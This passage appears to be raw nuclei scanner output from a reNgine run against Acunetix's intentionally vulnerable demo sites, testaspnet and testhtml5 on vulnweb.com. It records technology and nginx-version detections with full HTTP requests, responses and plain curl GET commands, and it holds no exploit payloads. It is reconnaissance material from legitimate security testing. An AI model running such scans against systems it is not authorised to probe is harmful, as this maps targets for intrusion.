border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(28) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(28) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(29) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:34:36.709634757Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.710198754Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.732173322Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find 